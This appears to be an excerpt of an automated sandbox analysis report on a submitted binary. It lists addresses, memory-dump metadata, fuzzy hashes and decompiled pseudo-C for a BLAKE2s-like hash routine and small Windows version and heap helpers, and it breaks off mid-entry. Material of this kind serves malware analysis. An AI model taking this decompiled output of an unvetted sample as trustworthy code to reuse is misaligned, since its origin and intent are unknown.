                                                        0x00a314bf
                                                        0x00a314c4
                                                        0x00a314c9
                                                        0x00a314c9
                                                        0x00a314d0
                                                        0x00a314d5
                                                        0x00a314da
                                                        0x00a314da
                                                        0x00a314e2
                                                        0x00a314f2
                                                        0x00a31504
                                                        0x00a31516
                                                        0x00a31529
                                                        0x00a3153b
                                                        0x00a31543
                                                        0x00a31548
                                                        0x00a3154d
                                                        0x00a3154d
                                                        0x00a31554
                                                        0x00a31559
                                                        0x00a31559
                                                        0x00a31560
                                                        0x00a31565
                                                        0x00a31565
                                                        0x00a3156c
                                                        0x00a31571
                                                        0x00a31571
                                                        0x00a31578
                                                        0x00a3157d
                                                        0x00a3157d
                                                        0x00a31587
                                                        0x00a31589
                                                        0x00a315c3
                                                        0x00a3158b
                                                        0x00a31590
                                                        0x00a315b4
                                                        0x00a315bc
                                                        0x00a315b0
                                                        0x00a315b0
                                                        0x00a315c6
                                                        0x00a315cd
                                                        0x00a315cf
                                                        0x00a315f1
                                                        0x00a315f9
                                                        0x00a315fc
                                                        0x00a315fc
                                                        0x00a315fe
                                                        0x00a315fe
                                                        0x00a31609
                                                        0x00a3160f
                                                        0x00a31614
                                                        0x00a3161b
                                                        0x00a31655
                                                        0x00a31660
                                                        0x00a31666
                                                        0x00a31669
                                                        0x00a3166c
                                                        0x00a31678
                                                        0x00a31680
                                                        0x00a3161d
                                                        0x00a31620
                                                        0x00a3162c
                                                        0x00a31632
                                                        0x00a31638
                                                        0x00a3163b
                                                        0x00a31644
                                                        0x00a31644
                                                        0x00a31683
                                                        0x00a31691
                                                        0x00a31697
                                                        0x00a3169e
                                                        0x00a316a0
                                                        0x00a316a0
                                                        0x00a316a7
                                                        0x00a316a9
                                                        0x00a316a9
                                                        0x00a316b0
                                                        0x00a316b2
                                                        0x00a316b2
                                                        0x00a316b9
                                                        0x00a316bb
                                                        0x00a316bb
                                                        0x00a316c2
                                                        0x00a316c4
                                                        0x00a316c4
                                                        0x00a316d1
                                                        0x00a316d4
                                                        0x00a3170b
                                                        0x00a316d6
                                                        0x00a316d6
                                                        0x00a316d9
                                                        0x00a31704
                                                        0x00a316f9
                                                        0x00a316f9
                                                        0x00a3170d
                                                        0x00a31715
                                                        0x00a31718
                                                        0x00a31737
                                                        0x00a3173c
                                                        0x00a3173c
                                                        0x00a3173e
                                                        0x00a31743
                                                        0x00a3174f
                                                        0x00a31745
                                                        0x00a31748
                                                        0x00a31748
                                                        0x00a31754
                                                        0x00a31754
                                                        0x00a3171a
                                                        0x00a3171d
                                                        0x00a3172c
                                                        0x00000000
                                                        0x00a3172c
                                                        0x00a3171f
                                                        0x00a31722
                                                        0x00a31724
                                                        0x00a31724
                                                        0x00000000
                                                        0x00a31722
                                                        0x00a316db
                                                        0x00a316de
                                                        0x00a316f4
                                                        0x00000000
                                                        0x00a316f4
                                                        0x00a316e3
                                                        0x00a316e5
                                                        0x00a316e5
                                                        0x00a316e3
                                                        0x00000000
                                                        0x00a316d4
                                                        0x00a315d6
                                                        0x00a315e4
                                                        0x00a315ec
                                                        0x00000000
                                                        0x00a315ec
                                                        0x00a315da
                                                        0x00a315df
                                                        0x00a315df
                                                        0x00000000
                                                        0x00a315da
                                                        0x00a31597
                                                        0x00a315a5
                                                        0x00a315ad
                                                        0x00000000
                                                        0x00a315ad
                                                        0x00a3159b
                                                        0x00a315a0
                                                        0x00a315a0
                                                        0x00a3159b

                                                        APIs
                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00A3145F,?,?,00000008,?,?,00A310FF,00000000), ref: 00A31691
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: ExceptionRaise
                                                        • String ID:
                                                        • API String ID: 3997070919-0
                                                        • Opcode ID: df5964088eb6d4ddb69454c6af87072f58dc2da9331f954f9e3928abed8da65d
                                                        • Instruction ID: ae3519c528745b2f1a6e4abfa3fe4ec33f1936f071981ee3e2ec8ac471c7e309
                                                        • Opcode Fuzzy Hash: df5964088eb6d4ddb69454c6af87072f58dc2da9331f954f9e3928abed8da65d
                                                        • Instruction Fuzzy Hash: 74B14A76610608DFD719CF28C48AB657BE0FF45364F298658F89ACF2A1C335E992CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A03FFE Relevance: 1.6, Strings: 1, Instructions: 332COMMONCrypto
                                                        Download Yara Rule
                                                        C-Code - Quality: 81%
                                                        			E00A03FFE() {
				void* _t230;
				signed int* _t231;
				intOrPtr _t240;
				signed int _t245;
				intOrPtr _t246;
				signed int _t257;
				intOrPtr _t258;
				signed int _t269;
				intOrPtr _t270;
				signed int _t275;
				signed int _t280;
				signed int _t285;
				signed int _t290;
				signed int _t295;
				intOrPtr _t296;
				signed int _t301;
				intOrPtr _t302;
				signed int _t307;
				intOrPtr _t308;
				signed int _t313;
				intOrPtr _t314;
				signed int _t319;
				signed int _t324;
				signed int _t329;
				signed int _t333;
				signed int _t334;
				signed int _t336;
				signed int _t337;
				signed int _t338;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t348;
				signed int _t350;
				signed int _t351;
				signed int _t353;
				signed int _t355;
				signed int _t356;
				signed int _t358;
				signed int _t360;
				signed int _t362;
				signed int _t363;
				signed int _t365;
				signed int _t366;
				signed int _t368;
				signed int _t369;
				signed int _t371;
				signed int _t372;
				signed int _t374;
				signed int _t375;
				intOrPtr _t376;
				intOrPtr _t377;
				signed int _t379;
				signed int _t381;
				intOrPtr _t383;
				signed int _t385;
				signed int _t386;
				signed int _t388;
				signed int _t389;
				signed int _t390;
				signed int _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t395;
				intOrPtr _t396;
				signed int _t398;
				intOrPtr _t399;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				signed int _t414;
				signed int _t418;
				signed int _t420;
				signed int _t422;
				signed int _t423;
				signed int _t425;
				signed int _t427;
				signed int _t429;
				intOrPtr _t431;
				signed int _t433;
				intOrPtr _t434;
				void* _t435;
				void* _t436;
				void* _t437;

				_t377 =  *((intOrPtr*)(_t435 + 0xc0));
				_t342 = 0x10;
				 *((intOrPtr*)(_t435 + 0x18)) = 0x3c6ef372;
				memcpy(_t435 + 0x8c,  *(_t435 + 0xd0), _t342 << 2);
				_t436 = _t435 + 0xc;
				_push(8);
				_t230 = memcpy(_t436 + 0x4c,  *(_t377 + 0xf4), 0 << 2);
				_t437 = _t436 + 0xc;
				_t418 =  *_t230 ^ 0x510e527f;
				_t231 =  *(_t377 + 0xfc);
				_t407 =  *(_t230 + 4) ^ 0x9b05688c;
				_t334 =  *(_t437 + 0x64);
				 *(_t437 + 0x28) = 0x6a09e667;
				 *(_t437 + 0x30) = 0xbb67ae85;
				_t379 =  *_t231 ^ 0x1f83d9ab;
				_t348 =  *(_t437 + 0x5c);
				 *(_t437 + 0x44) = _t231[1] ^ 0x5be0cd19;
				 *(_t437 + 0x3c) =  *(_t437 + 0x68);
				 *(_t437 + 0x1c) =  *(_t437 + 0x60);
				 *(_t437 + 0x2c) =  *(_t437 + 0x58);
				 *(_t437 + 0x38) =  *(_t437 + 0x54);
				 *(_t437 + 0x20) =  *(_t437 + 0x50);
				 *((intOrPtr*)(_t437 + 0x10)) = 0;
				 *((intOrPtr*)(_t437 + 0x48)) = 0;
				_t427 =  *(_t437 + 0x44);
				 *(_t437 + 0x14) =  *(_t437 + 0x4c);
				_t240 =  *((intOrPtr*)(_t437 + 0x10));
				 *(_t437 + 0x24) = 0xa54ff53a;
				 *(_t437 + 0x40) = _t334;
				 *(_t437 + 0x34) = _t348;
				do {
					_t37 = _t240 + 0xa33680; // 0x3020100
					_t350 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t37 & 0x000000ff) * 4)) + _t348;
					 *(_t437 + 0x14) = _t350;
					_t351 = _t350 ^ _t418;
					asm("rol ecx, 0x10");
					_t245 =  *(_t437 + 0x28) + _t351;
					_t420 =  *(_t437 + 0x34) ^ _t245;
					 *(_t437 + 0x28) = _t245;
					_t246 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror esi, 0xc");
					 *(_t437 + 0x34) = _t420;
					_t48 = _t246 + 0xa33681; // 0x4030201
					_t422 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t48 & 0x000000ff) * 4)) + _t420;
					 *(_t437 + 0x14) = _t422;
					_t423 = _t422 ^ _t351;
					asm("ror esi, 0x8");
					_t353 =  *(_t437 + 0x28) + _t423;
					 *(_t437 + 0x28) = _t353;
					asm("ror eax, 0x7");
					 *(_t437 + 0x34) =  *(_t437 + 0x34) ^ _t353;
					_t60 =  *((intOrPtr*)(_t437 + 0x10)) + 0xa33682; // 0x5040302
					_t355 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t60 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
					 *(_t437 + 0x20) = _t355;
					_t356 = _t355 ^ _t407;
					asm("rol ecx, 0x10");
					_t257 =  *(_t437 + 0x30) + _t356;
					_t409 =  *(_t437 + 0x1c) ^ _t257;
					 *(_t437 + 0x30) = _t257;
					_t258 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edi, 0xc");
					 *(_t437 + 0x1c) = _t409;
					_t71 = _t258 + 0xa33683; // 0x6050403
					_t411 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t71 & 0x000000ff) * 4)) + _t409;
					 *(_t437 + 0x20) = _t411;
					_t412 = _t411 ^ _t356;
					asm("ror edi, 0x8");
					_t358 =  *(_t437 + 0x30) + _t412;
					 *(_t437 + 0x30) = _t358;
					asm("ror eax, 0x7");
					 *(_t437 + 0x1c) =  *(_t437 + 0x1c) ^ _t358;
					_t82 =  *((intOrPtr*)(_t437 + 0x10)) + 0xa33684; // 0x7060504
					_t336 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t82 & 0x000000ff) * 4)) + _t334;
					_t360 = _t336 ^ _t379;
					asm("rol ecx, 0x10");
					_t269 =  *(_t437 + 0x18) + _t360;
					_t381 =  *(_t437 + 0x40) ^ _t269;
					 *(_t437 + 0x18) = _t269;
					_t270 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t91 = _t270 + 0xa33685; // 0x8070605
					_t337 = _t336 +  *((intOrPtr*)(_t437 + 0x8c + ( *_t91 & 0x000000ff) * 4)) + _t381;
					 *(_t437 + 0x38) = _t337;
					_t338 = _t337 ^ _t360;
					asm("ror ebx, 0x8");
					_t275 =  *(_t437 + 0x18) + _t338;
					 *(_t437 + 0x18) = _t275;
					asm("ror edx, 0x7");
					 *(_t437 + 0x40) = _t381 ^ _t275;
					_t383 =  *((intOrPtr*)(_t437 + 0x10));
					_t101 = _t383 + 0xa33686; // 0x9080706
					_t362 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t101 & 0x000000ff) * 4)) +  *(_t437 + 0x3c);
					 *(_t437 + 0x2c) = _t362;
					_t363 = _t362 ^ _t427;
					asm("rol ecx, 0x10");
					_t280 =  *(_t437 + 0x24) + _t363;
					_t429 =  *(_t437 + 0x3c) ^ _t280;
					 *(_t437 + 0x24) = _t280;
					_t110 = _t383 + 0xa33687; // 0xa090807
					asm("ror ebp, 0xc");
					_t385 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t110 & 0x000000ff) * 4)) + _t429;
					 *(_t437 + 0x2c) = _t385;
					_t386 = _t385 ^ _t363;
					asm("ror edx, 0x8");
					_t285 =  *(_t437 + 0x24) + _t386;
					 *(_t437 + 0x24) = _t285;
					asm("ror ebp, 0x7");
					 *(_t437 + 0x3c) = _t429 ^ _t285;
					_t431 =  *((intOrPtr*)(_t437 + 0x10));
					_t121 = _t431 + 0xa33688; // 0xb0a0908
					_t365 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t121 & 0x000000ff) * 4)) +  *(_t437 + 0x1c);
					 *(_t437 + 0x14) = _t365;
					_t366 = _t365 ^ _t386;
					asm("rol ecx, 0x10");
					_t290 =  *(_t437 + 0x18) + _t366;
					_t388 =  *(_t437 + 0x1c) ^ _t290;
					 *(_t437 + 0x18) = _t290;
					_t130 = _t431 + 0xa33689; // 0xc0b0a09
					asm("ror edx, 0xc");
					_t433 =  *(_t437 + 0x14) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t130 & 0x000000ff) * 4)) + _t388;
					 *(_t437 + 0x14) = _t433;
					 *(_t437 + 0x4c) = _t433;
					_t427 = _t433 ^ _t366;
					asm("ror ebp, 0x8");
					_t295 =  *(_t437 + 0x18) + _t427;
					_t389 = _t388 ^ _t295;
					 *(_t437 + 0x18) = _t295;
					 *(_t437 + 0x74) = _t295;
					_t296 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0x7");
					 *(_t437 + 0x1c) = _t389;
					 *(_t437 + 0x60) = _t389;
					_t144 = _t296 + 0xa3368a; // 0xd0c0b0a
					_t390 =  *(_t437 + 0x40);
					_t368 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t144 & 0x000000ff) * 4)) + _t390;
					 *(_t437 + 0x20) = _t368;
					_t369 = _t368 ^ _t423;
					asm("rol ecx, 0x10");
					_t301 =  *(_t437 + 0x24) + _t369;
					_t391 = _t390 ^ _t301;
					 *(_t437 + 0x24) = _t301;
					_t302 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t154 = _t302 + 0xa3368b; // 0xe0d0c0b
					_t425 =  *(_t437 + 0x20) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t154 & 0x000000ff) * 4)) + _t391;
					 *(_t437 + 0x20) = _t425;
					 *(_t437 + 0x50) = _t425;
					_t418 = _t425 ^ _t369;
					asm("ror esi, 0x8");
					_t307 =  *(_t437 + 0x24) + _t418;
					_t392 = _t391 ^ _t307;
					 *(_t437 + 0x24) = _t307;
					 *(_t437 + 0x78) = _t307;
					_t308 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0x7");
					 *(_t437 + 0x40) = _t392;
					 *(_t437 + 0x64) = _t392;
					_t167 = _t308 + 0xa3368c; // 0xf0e0d0c
					_t393 =  *(_t437 + 0x3c);
					_t371 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t167 & 0x000000ff) * 4)) + _t393;
					 *(_t437 + 0x38) = _t371;
					_t372 = _t371 ^ _t412;
					asm("rol ecx, 0x10");
					_t313 =  *(_t437 + 0x28) + _t372;
					_t394 = _t393 ^ _t313;
					 *(_t437 + 0x28) = _t313;
					_t314 =  *((intOrPtr*)(_t437 + 0x10));
					asm("ror edx, 0xc");
					_t177 = _t314 + 0xa3368d; // 0xe0f0e0d
					_t414 =  *(_t437 + 0x38) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t177 & 0x000000ff) * 4)) + _t394;
					 *(_t437 + 0x38) = _t414;
					 *(_t437 + 0x54) = _t414;
					_t407 = _t414 ^ _t372;
					asm("ror edi, 0x8");
					_t319 =  *(_t437 + 0x28) + _t407;
					_t395 = _t394 ^ _t319;
					 *(_t437 + 0x28) = _t319;
					asm("ror edx, 0x7");
					 *(_t437 + 0x3c) = _t395;
					 *(_t437 + 0x68) = _t395;
					_t396 =  *((intOrPtr*)(_t437 + 0x10));
					 *(_t437 + 0x6c) = _t319;
					_t190 = _t396 + 0xa3368e; // 0xa0e0f0e
					_t374 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t190 & 0x000000ff) * 4)) +  *(_t437 + 0x34);
					 *(_t437 + 0x2c) = _t374;
					_t375 = _t374 ^ _t338;
					asm("rol ecx, 0x10");
					_t324 =  *(_t437 + 0x30) + _t375;
					_t340 =  *(_t437 + 0x34) ^ _t324;
					 *(_t437 + 0x30) = _t324;
					_t199 = _t396 + 0xa3368f; // 0x40a0e0f
					asm("ror ebx, 0xc");
					_t398 =  *(_t437 + 0x2c) +  *((intOrPtr*)(_t437 + 0x8c + ( *_t199 & 0x000000ff) * 4)) + _t340;
					 *(_t437 + 0x2c) = _t398;
					 *(_t437 + 0x58) = _t398;
					_t379 = _t398 ^ _t375;
					asm("ror edx, 0x8");
					_t329 =  *(_t437 + 0x30) + _t379;
					_t341 = _t340 ^ _t329;
					 *(_t437 + 0x30) = _t329;
					 *(_t437 + 0x70) = _t329;
					asm("ror ebx, 0x7");
					_t240 =  *((intOrPtr*)(_t437 + 0x10)) + 0x10;
					 *(_t437 + 0x34) = _t341;
					_t348 =  *(_t437 + 0x34);
					 *(_t437 + 0x5c) = _t341;
					_t334 =  *(_t437 + 0x40);
					 *((intOrPtr*)(_t437 + 0x10)) = _t240;
				} while (_t240 <= 0x90);
				 *(_t437 + 0x84) = _t379;
				_t399 =  *((intOrPtr*)(_t437 + 0xd0));
				 *(_t437 + 0x88) = _t427;
				_t434 =  *((intOrPtr*)(_t437 + 0x48));
				 *(_t437 + 0x7c) = _t418;
				 *(_t437 + 0x80) = _t407;
				do {
					_t376 =  *((intOrPtr*)(_t399 + 0xf4));
					_t333 =  *(_t437 + _t434 + 0x6c) ^  *(_t376 + _t434) ^  *(_t437 + _t434 + 0x4c);
					 *(_t376 + _t434) = _t333;
					_t434 = _t434 + 4;
				} while (_t434 < 0x20);
				return _t333;
			}

























































































                                                        0x00a04004
                                                        0x00a0401e
                                                        0x00a04026
                                                        0x00a0402e
                                                        0x00a0402e
                                                        0x00a0403a
                                                        0x00a0403d
                                                        0x00a0403d
                                                        0x00a04049
                                                        0x00a0404f
                                                        0x00a04055
                                                        0x00a0405b
                                                        0x00a0405f
                                                        0x00a04068
                                                        0x00a04071
                                                        0x00a04077
                                                        0x00a04080
                                                        0x00a0408a
                                                        0x00a04092
                                                        0x00a0409a
                                                        0x00a040a2
                                                        0x00a040aa
                                                        0x00a040b2
                                                        0x00a040b6
                                                        0x00a040ba
                                                        0x00a040be
                                                        0x00a040c2
                                                        0x00a040c6
                                                        0x00a040ce
                                                        0x00a040d2
                                                        0x00a040d6
                                                        0x00a040d6
                                                        0x00a040ea
                                                        0x00a040f0
                                                        0x00a040f4
                                                        0x00a040fa
                                                        0x00a040fd
                                                        0x00a040ff
                                                        0x00a04101
                                                        0x00a04105
                                                        0x00a04109
                                                        0x00a0410c
                                                        0x00a04110
                                                        0x00a04124
                                                        0x00a0412a
                                                        0x00a0412e
                                                        0x00a04134
                                                        0x00a04137
                                                        0x00a0413b
                                                        0x00a0413f
                                                        0x00a04142
                                                        0x00a0414e
                                                        0x00a04160
                                                        0x00a04166
                                                        0x00a0416a
                                                        0x00a04170
                                                        0x00a04173
                                                        0x00a04175
                                                        0x00a04177
                                                        0x00a0417b
                                                        0x00a0417f
                                                        0x00a04182
                                                        0x00a04186
                                                        0x00a0419a
                                                        0x00a041a0
                                                        0x00a041a4
                                                        0x00a041aa
                                                        0x00a041ad
                                                        0x00a041b1
                                                        0x00a041b5
                                                        0x00a041b8
                                                        0x00a041c0
                                                        0x00a041d4
                                                        0x00a041dc
                                                        0x00a041e2
                                                        0x00a041e5
                                                        0x00a041e7
                                                        0x00a041e9
                                                        0x00a041ed
                                                        0x00a041f1
                                                        0x00a041f4
                                                        0x00a04204
                                                        0x00a0420a
                                                        0x00a0420e
                                                        0x00a04214
                                                        0x00a04217
                                                        0x00a0421b
                                                        0x00a0421f
                                                        0x00a04222
                                                        0x00a04226
                                                        0x00a0422a
                                                        0x00a0423c
                                                        0x00a04242
                                                        0x00a04246
                                                        0x00a0424c
                                                        0x00a0424f
                                                        0x00a04251
                                                        0x00a04253
                                                        0x00a04257
                                                        0x00a04262
                                                        0x00a0426e
                                                        0x00a04274
                                                        0x00a04278
                                                        0x00a0427e
                                                        0x00a04281
                                                        0x00a04285
                                                        0x00a04289
                                                        0x00a0428c
                                                        0x00a04290
                                                        0x00a04294
                                                        0x00a042a6
                                                        0x00a042ac
                                                        0x00a042b0
                                                        0x00a042b6
                                                        0x00a042b9
                                                        0x00a042bb
                                                        0x00a042bd
                                                        0x00a042c1
                                                        0x00a042cc
                                                        0x00a042d8
                                                        0x00a042de
                                                        0x00a042e2
                                                        0x00a042e6
                                                        0x00a042ec
                                                        0x00a042ef
                                                        0x00a042f1
                                                        0x00a042f3
                                                        0x00a042f7
                                                        0x00a042fb
                                                        0x00a042ff
                                                        0x00a04302
                                                        0x00a04306
                                                        0x00a0430a
                                                        0x00a04311
                                                        0x00a0431e
                                                        0x00a04320
                                                        0x00a04324
                                                        0x00a0432e
                                                        0x00a04331
                                                        0x00a04333
                                                        0x00a04335
                                                        0x00a04339
                                                        0x00a0433d
                                                        0x00a04340
                                                        0x00a04350
                                                        0x00a04356
                                                        0x00a0435a
                                                        0x00a0435e
                                                        0x00a04364
                                                        0x00a04367
                                                        0x00a04369
                                                        0x00a0436b
                                                        0x00a0436f
                                                        0x00a04373
                                                        0x00a04377
                                                        0x00a0437a
                                                        0x00a0437e
                                                        0x00a04382
                                                        0x00a04389
                                                        0x00a04396
                                                        0x00a0439c
                                                        0x00a043a0
                                                        0x00a043a6
                                                        0x00a043a9
                                                        0x00a043ab
                                                        0x00a043ad
                                                        0x00a043b1
                                                        0x00a043b5
                                                        0x00a043b8
                                                        0x00a043c8
                                                        0x00a043ce
                                                        0x00a043d2
                                                        0x00a043d6
                                                        0x00a043dc
                                                        0x00a043df
                                                        0x00a043e1
                                                        0x00a043e3
                                                        0x00a043e7
                                                        0x00a043ea
                                                        0x00a043ee
                                                        0x00a043f2
                                                        0x00a043f6
                                                        0x00a043fa
                                                        0x00a0440c
                                                        0x00a04412
                                                        0x00a04416
                                                        0x00a0441c
                                                        0x00a0441f
                                                        0x00a04421
                                                        0x00a04423
                                                        0x00a04427
                                                        0x00a04432
                                                        0x00a0443e
                                                        0x00a04440
                                                        0x00a04444
                                                        0x00a04448
                                                        0x00a0444a
                                                        0x00a04451
                                                        0x00a04453
                                                        0x00a04455
                                                        0x00a04459
                                                        0x00a04461
                                                        0x00a04464
                                                        0x00a04467
                                                        0x00a0446b
                                                        0x00a0446f
                                                        0x00a04473
                                                        0x00a04477
                                                        0x00a0447b
                                                        0x00a04486
                                                        0x00a0448d
                                                        0x00a04494
                                                        0x00a0449b
                                                        0x00a0449f
                                                        0x00a044a3
                                                        0x00a044aa
                                                        0x00a044aa
                                                        0x00a044b7
                                                        0x00a044bb
                                                        0x00a044be
                                                        0x00a044c1
                                                        0x00a044d0

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: gj
                                                        • API String ID: 0-4203073231
                                                        • Opcode ID: 0d57d218fe89d0166f28328cdcd9a1fa5b348b01b3fec8eb1893101a2ad161d8
                                                        • Instruction ID: ae233230d9e98250c1bc0f333a88f545700135bac24693047f4708f504fb95b8
                                                        • Opcode Fuzzy Hash: 0d57d218fe89d0166f28328cdcd9a1fa5b348b01b3fec8eb1893101a2ad161d8
                                                        • Instruction Fuzzy Hash: 90F1C2B2A083418FD748CF29D880A1AFBE1BFCC208F15892EF598D7711E774E9558B56
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A0AEE5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A0AEE5() {
				struct _OSVERSIONINFOW _v280;
				signed int _t6;
				intOrPtr _t12;
				intOrPtr _t13;

				_t12 =  *0xa3e020; // 0x2
				if(_t12 != 0xffffffff) {
					_t6 =  *0xa40f60; // 0xa
					_t13 =  *0xa40f64; // 0x0
				} else {
					_v280.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v280);
					_t12 = _v280.dwPlatformId;
					_t6 = _v280.dwMajorVersion;
					_t13 = _v280.dwMinorVersion;
					 *0xa3e020 = _t12;
					 *0xa40f60 = _t6;
					 *0xa40f64 = _t13;
				}
				if(_t12 != 2) {
					return 0x501;
				} else {
					return (_t6 << 8) + _t13;
				}
			}







                                                        0x00a0aee8
                                                        0x00a0aef7
                                                        0x00a0af35
                                                        0x00a0af3a
                                                        0x00a0aef9
                                                        0x00a0aeff
                                                        0x00a0af0a
                                                        0x00a0af10
                                                        0x00a0af16
                                                        0x00a0af1c
                                                        0x00a0af22
                                                        0x00a0af28
                                                        0x00a0af2d
                                                        0x00a0af2d
                                                        0x00a0af43
                                                        0x00000000
                                                        0x00a0af45
                                                        0x00000000
                                                        0x00a0af48

                                                        APIs
                                                        • GetVersionExW.KERNEL32(?), ref: 00A0AF0A
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: Version
                                                        • String ID:
                                                        • API String ID: 1889659487-0
                                                        • Opcode ID: a5d7b1368dc48b816c22d52d2a14ef26af5eaed207f75243dba2fdc958859024
                                                        • Instruction ID: 15bfb92fa399371259b772fc3782e738ef8a5af7f741ab43e36944c2bc8006dd
                                                        • Opcode Fuzzy Hash: a5d7b1368dc48b816c22d52d2a14ef26af5eaed207f75243dba2fdc958859024
                                                        • Instruction Fuzzy Hash: 8AF030B9D0030C8FCB28DB58FD41AE973B5F79A310F2046A9EA1943394D771AD46DE51
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00A2BAA0 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E00A2BAA0() {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0xa616ec = _t3;
				return _t3 & 0xffffff00 | _t3 != 0x00000000;
			}




                                                        0x00a2baa0
                                                        0x00a2baa8
                                                        0x00a2bab0

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.292411830.0000000000A01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A00000, based on PE: true
                                                        • Associated: 00000001.00000002.292398158.0000000000A00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292495749.0000000000A33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292543053.0000000000A3E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292551457.0000000000A44000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292577537.0000000000A61000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.292588496.0000000000A62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_a00000_2cB42TzofC.jbxd
                                                        Similarity
                                                        • API ID: HeapProcess
                                                        • String ID:
                                                        • API String ID: 54951025-0
                                                        • Opcode ID: 3214212f9a0e1bf54ce27d62555baa839f6d0bb5842473792d00adbb2d84ba83
                                                        • Instruction ID: 749f0436968f4787850221798bd9558f9a68f9f195af09279b2382c4f48c8165
